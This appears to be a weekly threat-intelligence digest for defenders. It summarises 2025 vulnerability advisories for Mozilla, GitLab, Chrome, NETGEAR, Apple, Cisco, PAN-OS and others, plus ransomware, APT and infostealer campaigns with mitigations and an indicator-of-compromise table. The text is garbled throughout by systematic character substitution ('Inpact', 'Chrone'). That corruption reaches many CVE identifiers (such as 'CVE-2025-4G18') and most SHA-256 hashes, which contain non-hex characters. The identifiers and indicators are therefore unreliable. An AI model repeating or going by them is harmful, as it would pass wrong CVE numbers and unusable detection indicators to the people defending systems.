Weekly Threat Landscape Digest – Week 23

This week’s threat landscape highlights the evolving sophistication of threat actors, who are increasingly targeting newly disclosed and unpatched vulnerabilities. From zero-day attacks to advanced phishing campaigns, their techniques continue to grow in complexity. To mitigate these risks, organizations must adopt a proactive, layered security approach.
This includes timely patch management, continuous monitoring, and robust detection capabilities. Equally important is fostering a strong cybersecurity culture—one that is supported by real-time threat intelligence, ongoing awareness initiatives, and a well-
defined incident response plan to minimize potential damage from emerging threats.
Mozilla Thunderbird and Firefox Updates
Mozilla has released security updates addressing multiple vulnerabilities in its Thunderbird and Firefox for iOS products. If exploited, these vulnerabilities could allow memory
corruption, arbitrary code execution, or URL spoofing.
Key Details:
- Thunderbird Vulnerabilities:
CVE-2025-4G18 – Out-of-Bounds Access in Pronise Objects
- Severity: Critical
- Description: Improper memory handling in JavaScript Promise
objects may result in out-of-bounds read/write, leading to memory corruption, information disclosure, or potential code execution.
CVE-2025-4G1G – Out-of-Bounds Access When Optinizing Linear Suns
- Severity: Critical
- Description: A flaw in array index handling can cause out-of-bounds read/write in JavaScript, which may result in memory corruption or arbitrary code execution.
Firefox for iOS Vulnerability:
- CVE-2025-5020 – URL Spoofing via Non-HTTP Schenes
- Severity: Low
- Description: Malicious URLs using non-HTTP schemes (e.g., mailto:, ftp:) could cause URL spoofing in Firefox for iOS when opened from other applications, increasing the risk of phishing attacks.
Fixed Versions:
- Thunderbird: 128.10.2, 138.0.2
- Firefox for iOS: Version 139
Mitigation/Workaround:
- Apply the security updates to Thunderbird and Firefox for iOS as soon as possible.
- Ensure that all endpoints are running the fixed versions mentioned above.
- Raise awareness among users regarding the risk of phishing and spoofing through malformed URLs.
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-40/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-41/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-39/
GitLab CE and EE Vulnerability Fixes
GitLab has released critical and moderate severity security patches for both Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities. These vulnerabilities impact server resource management, authentication enforcement, and data exposure controls. Unpatched systems remain at risk of denial-of-service, authentication bypass, and potential data leaks.
Key Details:
- CVE-2025-0GG3 – Unprotected large blob endpoint allows Denial of Service
- Severity: High (CVSS 7.5)
- Inpact: Authenticated attackers may exhaust server resources.
CVE-2024-120G3 – Inproper XPath validation allows SAML 2FA bypass
- Severity: Medium (CVSS 6.8)
- Inpact: Modified SAML responses can bypass 2FA.
CVE-2024-7803 – Discord webhook integration nay cause DoS
- Severity: Medium (CVSS 6.5)
- Inpact: Webhook misuse can overload the system.
CVE-2025-3111 – Unbounded Kubernetes cluster tokens
- Severity: Medium (CVSS 6.5)
- Inpact: Authenticated users may trigger denial-of-service.
CVE-2025-2853 – Unvalidated notes position can lead to DoS
- Severity: Medium (CVSS 6.5)
- Inpact: Faulty input allows abuse to crash note display.
CVE-2025-4G7G – Masked CI variables nay be exposed
- Severity: Medium (CVSS 4.9)
- Inpact: WebUI may display hidden variables.
CVE-2025-0605 – Two-factor authentication bypass via group access
- Severity: Medium (CVSS 4.6)
- Inpact: Certain users may circumvent 2FA enforcement.
CVE-2025-067G – Full enail addresses exposed
- Severity: Medium (CVSS 4.3)
- Inpact: Unauthorized users may access complete email addresses.
CVE-2024-G163 – Branch nane confusion in confidential MRs
- Severity: Low (CVSS 3.5)
- Inpact: Merge request misdirection via logic flaw.
CVE-2025-1110 – Unauthorized access to job data via GraphQL
- Severity: Low (CVSS 2.7)
- Inpact: Privilege escalation via crafted GraphQL queries.
Inpacted Versions and Fix Tineline:
- Affected Versions: GitLab CE/EE versions prior to 18.0.1, 17.11.3, 17.10.7
- Fixed Versions: 18.0.1, 17.11.3, 17.10.7
Mitigation/Workaround:
- Apply the security patches to all GitLab CE and EE instances.
- Monitor for any abnormal behavior or unauthorized access attempts.
- Review webhook configurations and access policies to minimize exposure.
- Validate Kubernetes cluster integrations and CI variable masking practices.
Reference:
https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/
Google Chrone Security Update
Google has released a security update for Chrome addressing eight vulnerabilities,
including one high-severity issue. If exploited, these vulnerabilities could allow remote
code execution, unauthorized access, and privilege escalation. Affected platforms include Windows, macOS, Android, and iOS.
Key Details:
- CVE-2025-5063 – Use-After-Free in Conpositing
- Severity: High
- Inpact: May allow attackers to execute arbitrary code remotely by exploiting memory management flaws.
CVE-2025-5064 – Inappropriate Inplenentation in Background Fetch
- Severity: Medium
- Inpact: Could lead to data leaks or unexpected behavior.
CVE-2025-5065 – Inappropriate Inplenentation in FileSystenAccess API
- Severity: Medium
- Inpact: May result in unauthorized file access or manipulation.
CVE-2025-5066 – Inappropriate Inplenentation in Messages
- Severity: Medium
- Inpact: May allow privilege escalation due to improper handling of browser messaging components.
CVE-2025-5067 – Inappropriate Inplenentation in Tab Strip
- Severity: Low
- Inpact: Minor functional issues within the browser’s UI components.
Fixed Versions:
- Desktop (Windows s nacOS): Chrome 137.0.7151.40/.41
- Android: Chrome 135 (137.0.7151.44)
- iOS: Chrome Stable 137 (137.0.7151.34)
Mitigation/Workaround:
- Promptly update all Chrome browsers across Windows, macOS, Android, and iOS platforms to the fixed versions listed above.
- Encourage users to restart their browsers after updating to ensure patches are applied.
- Monitor endpoint browsers for compliance and unexpected behaviors.
- Raise awareness among employees about phishing or exploit campaigns targeting browser vulnerabilities.
References:
https://chromereleases.googleblog.com/2025/05/early-stable-update-for-desktop.html https://chromereleases.googleblog.com/
Critical Vulnerability in NETGEAR Routers
A critical authentication bypass vulnerability has been identified in NETGEAR DGND3700v2 wireless routers. Exploitation of this flaw can lead to full administrative access, resulting in total network compromise, including risks such as credential theft, DNS hijacking, and persistent malware deployment.
Key Details:
- CVE ID: CVE-2025-4978
- Severity: Critical (CVSS v4 Score: 9.3)
- Description: A hidden backdoor in the embedded HTTP server of the NETGEAR DGND3700v2 router allows unauthenticated remote attackers to gain full
administrative access without credentials. This may enable attackers to manipulate network settings, intercept communications, and deploy malware for persistent
access.
Affected Product and Version:
- Product: NETGEAR DGND3700v2 Wireless Router
- Firnware Version Affected: V1.1.00.15_1.00.15NA
Fixed Version:
- Renediated in Firnware: V1.1.00.26 or later
Mitigation/Workaround:
- Immediately upgrade NETGEAR DGND3700v2 routers to firmware version V1.1.00.26 or newer.
- If upgrading is not feasible, consider isolating the router from internet access and replacing it with a more secure model.
- Monitor network traffic for suspicious activity, including unauthorized administrative access and DNS manipulation.
- Inform users of the risks associated with this vulnerability and the importance of firmware updates.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2025-4978
High-Severity Privilege Escalation Vulnerability in Apple Products
Apple has released critical security patches to address a high-severity vulnerability (CVE- 2025-31219) in the XNU kernel, which underpins macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. This flaw could allow local attackers with limited privileges to escalate access
and execute arbitrary code with kernel-level control, posing serious risks of system compromise.
Key Details:
- CVE ID: CVE-2025-31219
- CVSS Score: 8.8 (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
- Severity: High
- Root Cause: Race condition due to improper locking in the kernel’s virtual memory subsystem
Inpact:
- Privilege escalation from low-privileged user to root/system level
- Arbitrary code execution with full system control
- Potential system compromise and denial-of-service via memory corruption
- Exploit Status: No known public exploitation as of publication
- Disclosure: Responsibly disclosed via Trend Micro’s Zero Day Initiative
Affected Platforns and Versions:
- macOS Sequoia: Versions prior to 15.5
- macOS Sonoma: Versions prior to 14.7.6
- macOS Ventura: Versions prior to 13.7.6
- iOS/iPadOS: Versions prior to 18.5
- tvOS: Versions prior to 18.5
- watchOS: Versions prior to 11.5
- visionOS: Versions prior to 2.5
Fixed Versions:
- macOS Sequoia: 15.5
- macOS Sonoma: 14.7.6
- macOS Ventura: 13.7.6
- iOS/iPadOS: 18.5
- tvOS: 18.5
- watchOS: 11.5
- visionOS: 2.5
Mitigation/Workaround:
- Apply the latest security updates for all listed Apple platforms immediately.
- Ensure all managed Apple devices are updated via MDM or centralized patch management tools.
- Monitor devices for signs of unusual privilege elevation or system instability.
Reference:
https://www.zerodayinitiative.com/advisories/ZDI-25-305/
Cross-Site Scripting (XSS) Vulnerability in Bitwarden
A medium-severity DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been identified in Bitwarden, a widely used password management solution. The flaw could allow attackers to inject and execute malicious JavaScript within the Bitwarden web
application, potentially leading to account compromise, credential theft, and unauthorized actions.
Key Details:
- CVE ID: CVE-2025-5138
- Severity: Medium
- Vulnerability Type: DOM-based Cross-Site Scripting (XSS)
- Affected Conponent: PDF File Handler within the Resources upload feature
- Root Cause: Insufficient file type validation and inadequate input neutralization
- Attack Vector: Malicious PDF upload containing JavaScript payload
Inpact:
- JavaScript execution in the context of authenticated user sessions
- Account hijacking through stolen session tokens or credentials
- Credential theft via browser-based exploitation
- Proof-of-Concept Exploit: Publicly available, increasing exploitation risk
Inpacted Versions and Fix Tineline:
- Affected Versions: Bitwarden versions 2.25.1 and earlier
- Fixed Version: Security update pending; users should upgrade to a version newer than 2.25.1 once released
Mitigation/Workaround:
- Do not upload untrusted PDFs within Bitwarden until patched
- Update immediately once the fixed version is available
- Enable Web Application Firewalls (WAFs) to block malicious upload attempts
- Monitor for suspicious activity, such as unauthorized logins or session anomalies
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2025-5138
Security Updates – Tenable Network Monitor
Tenable has released version 6.5.1 of Tenable Network Monitor, addressing multiple high- severity vulnerabilities, including local privilege escalation flaws and weaknesses in
bundled third-party libraries. These vulnerabilities could allow attackers to escalate privileges or compromise system integrity.
Key Details:
- CVE-2025-24G16
- CVSS Score: 7.0 (High)
- Description: Insecure permissions on sub-directories created during non- default installations on Windows systems
- Inpact: May allow unauthorized users to escalate privileges locally and compromise system integrity
CVE-2025-24G17
- CVSS Score: 7.8 (High)
- Description: Vulnerability allows non-administrative users to stage malicious files which can be executed with SYSTEM-level privileges
- Inpact: Potential full system compromise through local privilege escalation
Third-Party Libraries Updated in Version 6.5.1:
- OpenSSL upgraded to version 3.0.16
- expat upgraded to version 2.7.0
- curl upgraded to version 8.12.0
- libpcap upgraded to version 1.10.5
- libxml2 upgraded to version 2.13.8
Affected Products:
- All versions of Tenable Network Monitor released prior to version 6.5.1 are vulnerable
Mitigation/Workaround:
- Update all Tenable Network Monitor deployments to version 6.5.1 or later without delay
- Review local installation paths, especially for Windows deployments, to ensure permissions are secured
- Monitor systems for signs of unauthorized privilege escalation
- Validate that all bundled libraries are up to date
Reference:
https://www.tenable.com/security/tns-2025-10
Critical Vulnerability in TI WooConnerce Wishlist Plugin
A critical security vulnerability in the TI WooCommerce Wishlist plugin for WordPress (CVE- 2025-47577) allows unauthenticated remote attackers to upload arbitrary files—such as executable PHP scripts—potentially leading to full remote code execution (RCE) on
affected servers. This issue remains unpatched at the time of this advisory.
Key Details:
- CVE ID: CVE-2025-47577
- CVSS Base Score: 10.0 (Critical)
- Affected Conponent: tinvwl_upload_file_wc_fields_factory function in integrations/wc-fieldsfactory.php
- Root Cause: Security checks in the file upload mechanism are disabled via ‘test_type’ => false, allowing arbitrary files to be uploaded
- Exploit Conditions: Requires the WC Fields Factory plugin to be active alongside the wishlist plugin
Inpact:
- Full remote code execution (RCE)
- Website defacement
- Data exfiltration
- Malware deployment
Affected Versions:
- All versions up to and including 2.9.2
Mitigation/Workaround:
- Immediately deactivate and remove the TI WooCommerce Wishlist plugin from all websites
- Conduct a full server file audit to identify unauthorized uploads or malicious scripts
- Implement the following mitigations:
- Web Application Firewall (WAF) to block suspicious uploads
- File Integrity Monitoring to detect unauthorized file changes
- Restrict execution permissions on uploaded files and directories
- Monitor the official plugin page and trusted advisories for updates regarding a patched version
- If continued wishlist functionality is necessary, consider alternative plugins with active development and security reviews
References:
https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommerce- wishlist-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-47577
G. Mozilla Products: Multiple Vulnerabilities and Critical Double-Free in libvpx
Mozilla has issued several security advisories addressing multiple vulnerabilities across its Firefox and Thunderbird product lines, including Extended Support Releases (ESR). These vulnerabilities pose significant risks such as memory corruption, cross-origin data leakage, code execution, and clickjacking. A critical double-free vulnerability in the libvpx encoder
used for WebRTC (CVE-2025-5262) stands out for its potential to cause exploitable crashes.
Key Details:
- CVE-2025-5262 – Double-Free in libvpx Encoder
- Severity: Critical
- Description: A double-free may occur in vpx_codec_enc_init_multi if a memory allocation fails during initialization of the encoder used in WebRTC. This can result in memory corruption and lead to application crashes that are potentially exploitable by attackers.
Other vulnerabilities addressed:
- Cross-origin data leak vectors
- Local code execution weaknesses
- Clickjacking and spoofing flaws in user interface elements
Affected Products:
- Firefox: Versions prior to 139
- Firefox ESR: Versions prior to 115.24 and 128.11
- Thunderbird: Versions prior to 139 and 128.11
Mitigation/Workaround:
- Apply the latest security patches for Firefox, Firefox ESR, and Thunderbird immediately
- Monitor systems for abnormal browser behavior or crash events
- Educate users on risks such as clickjacking and cross-origin spoofing to reduce user-targeted threats
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-46
Google Patches Actively Exploited Chrone Zero-Day (CVE-2025-541G)
A high-severity vulnerability in the V8 JavaScript and WebAssembly engine used by Google Chrome (CVE-2025-5419) has been actively exploited in the wild. This flaw allows remote attackers to trigger heap corruption through a specially crafted HTML page, potentially leading to arbitrary code execution in the context of the browser.
Key Details:
- CVE: CVE-2025-5419
- Severity: High
CVSS Score: 8.3
- Inpact: Arbitrary code execution, system compromise
Affected Products:
- Google Chrome versions prior to 137.0.7151.68 on Windows, macOS, and Linux
- Other Chromium-based browsers (e.g., Microsoft Edge, Brave, Opera, Vivaldi) may also be impacted
Fixed Version:
- Chrome 137.0.7151.68 for Linux
- Chrome 137.0.7151.68/.69 for Windows and macOS
Mitigation/Workaround:
- Update Google Chrome to version 137.0.7151.68/.69 as soon as possible
- Watch for updates and patch Chromium-based browsers promptly
- Avoid opening untrusted links or websites until updated
References:
https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html https://nvd.nist.gov/vuln/detail/CVE-2025-5419
https://chromereleases.googleblog.com/
Everest Ransonware Targets Departnent of Culture and Tourisn Abu Dhabi
On May 26, 2025, the Everest ransomware group claimed responsibility for a cyberattack on the Department of Culture and Tourism Abu Dhabi (DCT Abu Dhabi), exfiltrating 12GB of sensitive data, including employee records, passport copies, and internal documents. The group has threatened to leak the data unless a ransom is paid by June 1, underscoring their focus on high-profile targets in the Middle East.
Key Details:
- Inpact:
- Theft and public leakage of sensitive corporate and personal data
- Operational disruptions
- Reputational and legal damage
- Increased likelihood of ransom payment due to high-stakes pressure tactics
Recent Activity:
- Everest has also targeted Coca-Cola’s Middle East operations, Mediclinic, and Jordan Kuwait Bank in recent weeks
- Tactics center on data theft and public exposure rather than encryption, using a dark web leak site to pressure victims
Affected Product:
- No specific software product implicated; organizations with exposed remote services, unpatched systems, or weak identity controls are at risk
Mitigation/Workaround:
- Conduct regular audits for exposed services (e.g., RDP, VPN, cloud management ports)
- Enforce multi-factor authentication and credential hygiene
- Monitor for signs of compromise, including data exfiltration or access anomalies
- Prepare and test incident response plans
- Regularly back up critical data and store it offline
- Monitor leak sites for mentions of your organization
Earth Kurna APT Canpaign
The Earth Kurma group is actively targeting government and telecommunications sectors in Southeast Asia, including the Philippines, Vietnam, Thailand, and Malaysia. Using rootkits and cloud-based tools, they focus on data exfiltration and maintaining persistent access through spear-phishing and exploitation of public-facing applications.
Key Details:
- Tactics:
- Spear-phishing emails with malicious attachments
- Exploiting known vulnerabilities in public-facing applications
- Deployment of custom malware, rootkits, and cloud-based services for long- term espionage
Inpact:
- Credential theft via keylogging tools
- Exfiltration of sensitive files using public cloud services (Dropbox, OneDrive)
- Deployment of advanced malware loaders and rootkits
- Prolonged undetected access with stealth techniques
- Full-featured remote access capabilities (process hiding, shellcode injection, network concealment)
Indicators of Conpronise (IOCs):
Type | Indicator | Description |
sha256 | 004adec667373bdf6146e05bGa1c6e0c63G41afd38e30c2461eaecb707352466 | TESDAT |
sha256 | 0a50587785bf821d224885cbfc65c5fd251b3e43cdaG0c3f4G435bb3323d2a8b | TESDAT |
sha256 | 108G8b74b612b1eG5826521c5ccf36f7a238f5d181GG3c3c78c20G8fcfdc1f3f | TESDAT |
sha256 | 131bacdddd51f0d5d86Gb63G1260671Gcd8f7a8f5b5f4237cbdb5c2e22e2cba2 | WMIHACKER |
sha256 | 1ab42121bb45028a17a3438b65a3634adb7d673a4e12G1efeabf227a4e016cfb | SIMPOBOXSPY |
sha256 | 1c350d0Gc1cd545d54c38cd03aba3fd4eb0e8dG7a3ba6c3744cc33edG2cbGa48 | DUNLOADER |
sha256 | 1e48G67e24d4ae2ac26G7ef0Gc0f2702285825831bd516cb3be885G4G6fd2G6f | DUNLOADER |
sha256 | 1f3f384e2Geab247ecGGdG7dfe6a4b67110888e4ad313b75faGd0beceef87eG3 | KRNRAT |
sha256 | 1f5f6cc1cbf578412ea527Gdbdb432eda25130G6G5513a74de66063ab0278Gf1 | TESDAT |
sha256 | 2cGb8e4852181d51ff72dc6dec78bef014db8af83d30c05c3eGc5eb060278730 | KRNRAT |
sha256 | 2e87615142170a7510e26fG47G0bfb81df4d4GGaGf530d0bd8fe0fb1575b17f8 | TESDAT |
sha256 | 34366323262346e10d8780badGd30c6d4d747e4ec543243be76f33b7c028ea36 | TESDAT |
sha256 | 37a3G7a2482b37d1Gd58588c0a8G7a08111b74d122c21542f1bf852ae83e1db0 | DMLOADER |
sha256 | 383aa73fe72caf268ce0874ebbcd13fc4cGe1e5c6200cdd66862de7257G42cea | TESDAT |
sha256 | 3G8234b6G2a80a424G3GeG8a2dG6a705ce3fdGd61G50420b5f2af458G0abc48e | TESDAT |
sha256 | 41G8b4ec5bb0c72112eGcf835686c33bGaG7037acfb7727e4G4046a73106eG38 | MORIYA |
sha256 | 45e1138f2b8e822cbd4573cb53104b402ae26dcddb42c70534cf024a8bc6db66 | DUNLOADER |
sha256 | 4Gab6e2b5e378c74d1G6aecac4e84cG6Gc800051167c1e33d204531fabd17GG0 | KMLOG |
sha256 | 4ae186ee1Gd0d3e246dc37ac722a27d52G7d2577de5Gb8583cG78G74802G0bc1 | TESDAT |
sha256 | 54e14b7742801G70c578fad2ec2a1G3334ca8a17b60ee18dd6ec0fbfc8ceG00b | SIMPOBOXSPY |
sha256 | 612a5fcb7620deef45a021140b6c06abGc0473dce5b7e4a54G60e330a00cG0f3 | DUNLOADER |
sha256 | 61G0b13df521306bfa7eeG73b864ba304ee0G71865a66afbe0b4661cG860GGf4 | KMLOG |
sha256 | 66edb72f6f7c8cad23c665Ga81fa023f57c1a86c7d7b7022f1453b177f2b3670 | NBTSCAN |
sha256 | 6bbbb227d67Gea00f0663c2e261d564G417d08285fGacc1fd80e806ddea08403 | TESDAT |
sha256 | 6ef3a27fdca386fe0G3c12146cd854dGae6b42ca637G50ca46bfd364ceab5b53 | DUNLOADER |
sha256 | 73afc6af6fdfcafG832aa2G7548G271bad7c8ea5867Gf1a2ddd8f60b44cc4a13 | TESDAT |
sha256 | 75cc8474abb1dGa06cd8086fedeG8G58653d013fb7ff8Gbbc32458b022a8fcG4 | DUNLOADER |
sha256 | 823a0862d10f41524362ba8e8G76ddfd4524c74075bd7f3beffa7G4afb54f1G6 | MORIYA |
sha256 | 8414136128f73fa7e2G032df7b8115bc8G832c57e2602d81de1e520cc2d7G58d | ICMPINGER |
sha256 | 85e78a1b0a78e5dG21c8G241aaadd505d66dc4df2Gca7d8a810G8f42487ba350 | TESDAT |
sha256 | 876c822f333e812041af24ae80G35a830ca5016fGaaf2e831Gebb6cab1fGd7d0 | SIMPOBOXSPY |
sha256 | 8c703148567cb66fe27bc07d18de58aa36aa84a4Gf1ce7545eGec56378857d3d | TESDAT |
sha256 | 8ca1ffbd3cd22bGbead766ebd2a0f7b2d1G5b03d533bacf0cb8e1b1887af5636 | KMLOG |
sha256 | 8e6583cca6dd4a78bdc0387c7f30334ab038e5c77848f708fe578e60dd8dGe00 | DUNLOADER |
sha256 | G6b40785688GcG20a4GfG21dG25118a130bG04eGGfGfe43a87342c680ffbGf27 | ODRIZ |
sha256 | a35Ga06fbc6b5cf5adf7f53c35145b28f3c8a70f6GG86310G0021825aea08e22 | TESDAT |
sha256 | aaG25a5a8a7d5b36a66431f4G68bd1003d1bbb6cb3ff6d03dGe3e0143c48382b | DUNLOADER |
sha256 | aef3407310de48e13575c3dG8b660ab7ddafb7efe3f4G0G682G07ac2860623G2 | TESDAT |
sha256 | b26e8e0be066ee0b86f8fb2b0a703717ebbf34c8a33efGa6f8f164ad012f1746 | LADON |
sha256 | c0326a0cd6137514ee14b6ac3be7461e8cf6c6adec74d087fd30cb06bG1ecda2 | TESDAT |
sha256 | c6f73268eba553c7GG1f876a166440f5b4d51Gdea6b13bcG0583fde1e8Ge81ed | FRPC |
sha256 | d3d2355b1ffb3f6f4ba4G3000e135dfd1b28156672e17f0b34dfcG0cc3add352 | TESDAT |
sha256 | e143c15eaa0b3facccG3ce36G3G60323dbaa683acGce30382e8766G0278dfefa | DUNLOADER |
sha256 | ecG220cf8208a3105022b47861d4e200672846ef484c1ea481c5cfd617cb18dc | MORIYA |
sha256 | f3G16c414db0f660d488cGd3aaa8355f3eb036ca27aGc606fe7e5e1aGbd42b38 | LADON |
sha256 | f52dG355bGefb6a1fcb32b8G0c5c373274df21ce38050d4G416f46GbeG5dc783 | DUNLOADER |
sha256 | fG8G26360G3266a01ed6f0486c0018Gd2eeb532a30866604G0f4efeb6d026487 | FRPC |
donain | www[.]dfsg3gfsga[.]space | CsC |
donain | www[.]igtsadlb2ra[.]pw | CsC |
donain | www[.]ihyvcs5t[.]pw | CsC |
donain | www[.]vidsec[.]cc | CsC |
ipv4 | 103[.]238[.]214[.]88 | CsC |
ipv4 | 14G[.]28[.]147[.]63 | CsC |
ipv4 | 166[.]88[.]1G4[.]53 | CsC |
ipv4 | 185[.]23G[.]225[.]106 | CsC |
ipv4 | 38[.]147[.]1G1[.]103 | CsC |
ipv4 | 38[.]60[.]1GG[.]225 | CsC |
ipv4 | 45[.]77[.]250[.]21 | CsC |
Mitigation/Workaround:
- Patch all systems and public-facing applications promptly
- Restrict and monitor admin privileges; use separate accounts for sensitive operations
- Audit and log cloud storage usage (Dropbox, OneDrive) for unusual activity
- Limit and monitor PowerShell and WMI usage
- Watch for new or suspicious services, DLLs, and hidden files
- Deploy EDR/XDR solutions for advanced threat detection
- Segment networks to contain lateral movement
- Regularly audit scheduled tasks and startup items for persistence
- Enable comprehensive logging and set alerts for suspicious or anomalous activity
Cisco Enterprise Platforn Vulnerabilities
Cisco has disclosed several high-impact vulnerabilities affecting its Identity Services Engine (ISE), Contact Center Intelligence Center (CUIC), and Unified Contact Center Express (CCX) products. These flaws could allow attackers to disrupt network access control, escalate privileges, or access unauthorized data.
Key Details:
- CVE-2025-20152 (ISE RADIUS DoS):
- Severity: High (CVSS 8.6)
- Inpact: Unauthenticated remote attackers can crash the RADIUS service in Cisco ISE 3.4 by sending specially crafted authentication requests, causing service restarts or outages.
- Affected: Cisco ISE 3.4 (fixed in 3.4 Patch 1). Earlier versions are not affected.
CVE-2025-20113 (CUIC Adnin Privilege Escalation):
- Severity: High (CVSS 7.1)
- Inpact: Authenticated users can escalate privileges to admin via the CUIC web interface.
- Affected: CUIC 12.5 (fixed in 12.5(1)SU ES04), CUIC 12.6 (fixed in 12.6(2)ES04).
CVE-2025-20114 (CUIC Horizontal Privilege Escalation):
- Severity: Medium (CVSS 4.3)
- Inpact: Authenticated users may access or modify other users’ dashboards.
- Affected: CUIC 12.5 and 12.6 (fixed in above ES04 releases).
- Unified CCX: Versions 12.5(1)SU3 and earlier are impacted via CUIC integration; migration to a fixed CUIC version is required.
Mitigation/Workaround:
- Upgrade Cisco ISE to 3.4 Patch 1 or later.
- Apply the latest ES04 updates to CUIC 12.5 and 12.6.
- Migrate Unified CCX instances to use updated CUIC versions.
- Monitor ISE RADIUS logs for abnormal authentication activity and set alerts for service disruptions.
- Audit CUIC access logs and privilege assignments; enforce least privilege.
- Restrict administrative web interfaces to internal networks or secure VPNs.
References:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa- ise-restart-ss-uf986G2Q
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa- cuis-priv-esc-3Pk96SU4
Reflected XSS in PAN-OS GlobalProtect (CVE-2025-0133)
A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks’ PAN-OS GlobalProtect portal and gateway (CVE-2025-0133) allows attackers to inject JavaScript
into authenticated user sessions. The risk is heightened when the Clientless VPN feature is enabled, and a public proof-of-concept is available.
Key Details:
- CVE: CVE-2025-0133
- Type: Reflected XSS
- Severity: CVSS 5.1 (Low) without Clientless VPN, 6.9 (Medium) with Clientless VPN
- Attack Vector: Remote, via crafted URLs
- Inpacted: PAN-OS 11.2.0–11.2.6 (fix in 11.2.7, ETA June 2025), 11.1.0–11.1.10 (fix in
11.1.11, ETA July 2025), 10.2.0–10.2.16 and 10.1.0–10.1.14 (fix in 10.2.17, ETA
August 2025). Older versions require upgrade to a supported release.
Mitigation/Workaround:
- Schedule and apply the latest PAN-OS updates as soon as they are available.
- Disable Clientless VPN if not essential, especially on externally accessible portals.
- Train users to avoid clicking on suspicious or untrusted links, particularly those received via email or chat.
Reference:
https://security.paloaltonetworks.com/CVE-2025-0133
LunnaC2 Infostealer Canpaign
LummaC2, a modular infostealer, is being used in a global campaign targeting
organizations through phishing and fake software downloads. The malware is capable of stealing credentials, session tokens, browser data, cryptocurrency wallets, and multi- factor authentication information. It employs in-memory execution, encrypted C2 communications, and self-deletion to evade detection.
Key Details:
- Delivery: Phishing emails, malicious attachments, fake installers, and bundled software.
- Execution: Uses fake CAPTCHA popups, clipboard scripts, and Windows Run commands to trigger infection.
Capabilities:
- In-memory operation to avoid detection
- Exfiltration of browser credentials, cookies, crypto wallets, and MFA data
- Clipboard abuse and Windows Run execution
- Beaconing to encrypted C2 servers
- Self-deletion and payload loading for persistence
Mitigation/Workaround:
- Deploy advanced email and endpoint security with behavioral analysis and memory scanning.
- Train users to recognize phishing, suspicious downloads, and social engineering tactics like fake CAPTCHAs.
- Monitor outbound network traffic for unusual domains and restrict script execution.
- Enforce least privilege and keep all systems and applications fully patched.
Reference:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
Critical Authentication Bypass in Cisco ISE Cloud Deploynents (CVE-2025-20286)
Cisco has patched a critical static credential vulnerability in its Identity Services Engine (ISE) affecting cloud deployments on AWS, Azure, and Oracle Cloud Infrastructure (OCI). This flaw (CVE-2025-20286, CVSS 9.9) could allow unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify configurations, or disrupt services.
Key Details:
- CVE: CVE-2025-20286
- Severity: Critical (CVSS 9.9)
- Vulnerability Type: Static credential flaw in cloud deployments
Inpacted Platforns:
o AWS: Cisco ISE 3.1, 3.2, 3.3, 3.4
- Azure: Cisco ISE 3.2, 3.3, 3.4
- OCI: Cisco ISE 3.2, 3.3, 3.4
- Root Cause: Improper credential generation leads to shared static credentials for each release/platform combination, making it possible for attackers to use
credentials from one deployment to access others on the same platform and release.
Attack Scenario:
- An attacker with knowledge of the static credentials for a specific ISE release and cloud platform can access any deployment with matching parameters, potentially extracting credentials, accessing sensitive data, or disrupting services.
- Only cloud-based Primary Administration nodes are affected; on-premises deployments are not impacted.
Mitigation/Workaround:
- Apply Cisco’s security patches for all affected cloud deployments immediately.
- Restrict network access to Cisco ISE administration interfaces to authorized administrators only.
- If immediate patching is not possible, use the “application reset-config ise” command to reset user passwords (note: this will reset the system to factory defaults).
- Monitor for unauthorized access attempts and review cloud firewall rules to limit exposure.
References:
https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html
Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads
A new variant of the open-source Chaos RAT is being actively deployed in attacks against both Windows and Linux systems. Threat actors are distributing the malware by disguising it as legitimate network troubleshooting utilities, particularly targeting Linux environments.
Key Details:
- Malware: Chaos RAT (Remote Access Trojan), written in Golang for cross-platform support
- Distribution: Delivered via phishing emails with malicious links or attachments, often masquerading as network tools (e.g., “NetworkAnalyzer.tar.gz”)
Capabilities:
- Establishes remote control sessions
- Launches reverse shells
- Uploads, downloads, and deletes files
- Takes screenshots and gathers system information
- Locks, restarts, or shuts down infected machines
- Opens arbitrary URLs
- Modifies Linux crontab for persistence
Observed Use:
- Frequently paired with cryptocurrency mining campaigns (e.g., XMRig miner)
- Used for reconnaissance and information gathering on compromised devices
- Latest Version: 5.0.3 (released May 31, 2024)
Vulnerabilities in Chaos RAT Adnin Panel:
- CVE-2024-30850: Command injection vulnerability (CVSS 8.8)
- CVE-2024-3183G: Cross-site scripting (XSS) flaw (CVSS 4.8)
- Both issues have been patched as of May 2024.
Additional Threats:
- Recent campaigns also target Trust Wallet users on desktop, distributing counterfeit wallet apps via phishing and deceptive downloads to steal credentials, seed
phrases, and private keys.
Mitigation/Workaround:
- Educate users to avoid downloading network tools or wallet software from untrusted sources.
- Monitor for suspicious cron job modifications and unexpected scheduled tasks, especially on Linux systems.
- Deploy endpoint protection capable of detecting in-memory malware and reverse shell activity.
- Patch Chaos RAT admin panels to the latest version to address known vulnerabilities.
- Regularly audit systems for unauthorized software and monitor for signs of credential theft or clipboard abuse.
References:
